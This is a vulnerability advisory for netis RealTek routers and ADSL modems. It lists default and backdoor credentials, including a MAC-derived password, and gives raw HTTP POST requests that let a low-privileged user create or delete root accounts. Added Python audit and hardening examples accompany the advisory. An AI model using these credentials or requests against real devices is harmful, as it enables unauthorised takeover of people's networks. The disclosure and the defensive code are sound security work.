moften

netis RealTek wireless router / ADSL modem Multiple Vulnerabilities

Oct 19th, 2015
# Exploit Title: [netis RealTek wireless router / ADSL modem Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [Vulnerability? What's this?]
# Vendor Homepage: [www.netis-systems.com]
# Version Affected: [Firmware version RTK v2.1.1]


**Vulnerability Details**

* 1. Default, weak passwords for http and ftp services *

a. *HTTP accounts*
- guest/guest
- user/user
- guest/XXXXairocon

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="guest"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x2"/>
</chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x0"/> </chain>

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/> </chain>

*XXXX -> last four digits of MAC address *

b. *FTP accounts*

- admin/admin
- useradmin/useradmin
- user/user

<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="admin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x3"/>
<V N="INSTNUM" V="0x1"/> </chain>

<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="useradmin"/>
<V N="PASSWORD" V="useradmin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x2"/>
<V N="INSTNUM" V="0x2"/> </chain>

<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x1"/>
<V N="INSTNUM" V="0x3"/> </chain>


2. *Backdoor accounts*
The device comes configured with a privileged backdoor account.

For HTTP, 'guest' with the attribute <V N="BACKDOOR" V="0x1"/> is the backdoor
account. This is seen in the config file:

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/>
</chain>

This user is not shown in the user list even when logged in as guest
(the privileged user).

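The account entries in sections 1 and 2 share one layout: <chain> blocks holding <V N="..." V="..."/> values. As an added example, not part of the advisory, the following Python audit script parses that layout from a config dump and flags default credentials, entries carrying the BACKDOOR flag, and the MAC-derived 'airocon' password pattern; the sample excerpt is constructed, and treating the XXXX prefix as four hex digits is an assumption.

```python
import re
import xml.etree.ElementTree as ET

# Constructed excerpt in the <chain>/<V> layout the advisory shows (not a real config.img dump).
SAMPLE_CONFIG = """
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/><V N="USERNAME" V="guest"/><V N="PASSWORD" V="guest"/>
<V N="BACKDOOR" V="0x0"/><V N="PRIORITY" V="0x2"/>
</chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/><V N="USERNAME" V="guest"/><V N="PASSWORD" V="1A2Bairocon"/>
<V N="BACKDOOR" V="0x1"/><V N="PRIORITY" V="0x1"/>
</chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/><V N="USERNAME" V="ops"/><V N="PASSWORD" V="Xk9!pQr2"/>
<V N="BACKDOOR" V="0x0"/><V N="PRIORITY" V="0x0"/>
</chain>
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/><V N="USERNAME" V="admin"/><V N="PASSWORD" V="admin"/>
<V N="PORT" V="0x15"/><V N="USERRIGHT" V="0x3"/><V N="INSTNUM" V="0x1"/>
</chain>
"""

# Assumption: the "last four digits of MAC address" prefix is four hex digits.
MAC_SUFFIX_PW = re.compile(r"[0-9A-Fa-f]{4}airocon")


def parse_chains(text):
    """Return [(chain_name, {N: V, ...}), ...]; the fragments are wrapped in a root element."""
    root = ET.fromstring("<root>" + text + "</root>")
    return [(c.get("N"), {v.get("N"): v.get("V") for v in c.findall("V")})
            for c in root.findall("chain")]


def audit(text):
    """Flag risky account entries; returns a list of (chain, username, reason)."""
    findings = []
    for chain, vals in parse_chains(text):
        if chain not in ("USERNAME_PASSWORD", "FTP_SERVER"):
            continue
        if chain == "FTP_SERVER" and vals.get("ENABLE") != "0x1":
            continue  # a disabled FTP entry is not reachable
        user, pw = vals.get("USERNAME", ""), vals.get("PASSWORD", "")
        if user == pw:
            findings.append((chain, user, "default credential: username equals password"))
        if vals.get("BACKDOOR") == "0x1":
            findings.append((chain, user, "hidden account: BACKDOOR flag set"))
        if MAC_SUFFIX_PW.fullmatch(pw):
            findings.append((chain, user, "vendor-pattern password derived from MAC address"))
    return findings


if __name__ == "__main__":
    for chain, user, reason in audit(SAMPLE_CONFIG):
        print(f"{chain:18} {user:10} {reason}")
```

Run against a dump taken before and after a configuration change to spot accounts that the GUI user list does not show.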

3. *No CSRF protection*
There is no CSRF token set in any of the forms / pages.

It is therefore possible to silently execute state-changing HTTP requests on
behalf of a logged-in user.


4. *Weak RBAC controls *

4a) *A non-root/non-admin user (user) can create and delete any other
users, including root-privileged accounts. *

On the netis RealTek wireless router / ADSL modem, there are three users:

guest:guest -> priv 2, the super user account with full functional access
user:user -> priv 0 -> can access only some functions
guest:XXXXairocon -> privileged backdoor login


*Normally: *

- user can create new accounts with restricted user privileges only.
- user can change its own password and the passwords of other non-root users only.
- user can delete any other non-root users.

However, the application does not enforce strict RBAC, and it is possible
for a non-root user to create a new user with root privileges.


This is done as follows:

1. Start creating a new user, and intercept the user creation POST
request
2. Intercept & change the privilege parameter value from 0 (user) to 2 (root),
then submit the request
3. When the new root user is created successfully, it does not show up in
the user list
4. Confirm by logging in as the new root user, and / or via the configured
accounts in the configuration file (config.img)


This is the POST request to create a new user:

*Create user http request*:

POST /form2userconfig.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=



*Note1*: In some cases, this password change function is not accessible to
'user' via the GUI. But we can still send a POST request to create a valid new
root-privileged account.

*Note2*: In some cases, the application does not create the root-privileged user
on the first attempt. However, on the 2nd or 3rd attempt, the new user is created
without any issue.


*Delete user http request:*
A non-root/non-admin user can delete any configured user(s), including
privileged users (guest).

POST /form2userconfig.cgi HTTP/1.1
Host: <ip>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%



In case a (non-root) user is deleting a root login (guest, priv 2), the action
status can be confirmed by checking the configuration. In case a (non-root)
user is deleting a user login (priv 0), the action status can be confirmed by
checking the user list.


4b) *(non-root priv) User can access unauthorized functions.*
Normally, 'user' does not have access to all the functionality of the
device. It has access to Status, Setup and Maintenance.

However, a few functions can still be accessed by calling them directly. For
example, the MAC filtering configuration can be opened directly at this
URL:

http://<IP>/fw-macfilter.htm

Other functions may also be accessible in this manner.
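
Sections 3 and 4 come down to checks that form2userconfig.cgi never performs on the server side. As an added example (not the vendor's code), this Python model of that handler shows what a fixed firmware would need: a per-session CSRF token, a ceiling on the client-supplied privilege parameter for adduser, and a privilege comparison for deluser. The in-memory account store and the Session class are assumptions; the form field names are the ones in the captured requests above.

```python
from dataclasses import dataclass
from secrets import compare_digest
from urllib.parse import parse_qs

# Privilege values as they appear in the captured form: 0 = user, 2 = root.
PRIV_USER, PRIV_ROOT = 0, 2

# Assumed in-memory account store (the real device keeps these in config.img).
ACCOUNTS = {"guest": PRIV_ROOT, "user": PRIV_USER}


@dataclass
class Session:
    """Assumed session model: the CSRF token is bound to the session and unguessable."""
    username: str
    csrf_token: str


def handle_userconfig(session, body, submitted_token):
    """Hardened model of form2userconfig.cgi; returns a status string."""
    # Check 1: reject cross-site submissions (the advisory notes no CSRF token anywhere).
    if not submitted_token or not compare_digest(session.csrf_token, submitted_token):
        return "error: missing or invalid CSRF token"
    form = {k: v[0] for k, v in parse_qs(body).items()}
    caller_priv = ACCOUNTS.get(session.username)
    if caller_priv is None:
        return "error: unknown session"
    target = form.get("username", "")
    if "adduser" in form:
        try:
            requested = int(form.get("privilege", "0"))
        except ValueError:
            return "error: bad privilege"
        # Check 2: privilege is client-supplied, so cap it at the caller's own level.
        if requested not in (PRIV_USER, PRIV_ROOT) or requested > caller_priv:
            return "error: privilege escalation denied"
        if not form.get("newpass") or form.get("newpass") != form.get("confpass"):
            return "error: password missing or mismatch"
        if not target or target in ACCOUNTS:
            return "error: invalid or existing username"
        ACCOUNTS[target] = requested
        return f"ok: created {target} with privilege {requested}"
    if "deluser" in form:
        if target not in ACCOUNTS:
            return "error: no such user"
        # Check 3: a caller may not delete an account more privileged than itself.
        if ACCOUNTS[target] > caller_priv:
            return "error: deletion denied"
        del ACCOUNTS[target]
        return f"ok: deleted {target}"
    return "error: no action"
```

The same privilege comparison belongs in front of every page the menu hides from 'user' (4b), since hiding a link is not an access control.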


6. *Sensitive information not secured from low privileged users *

A non-root / non-admin privileged user is able to download the
configuration file, config.img.

This file contains clear-text passwords, keys and other sensitive
information which can be used to gain privileged access.


7. *Sensitive information accessible in clear-text*

Sensitive information like passwords and keys is not secured properly.
Mostly these are either shown in clear-text or censored as *****; it is
possible to view the clear-text values via 'Inspect Element' locally, by
intercepting HTTP requests, or by sniffing.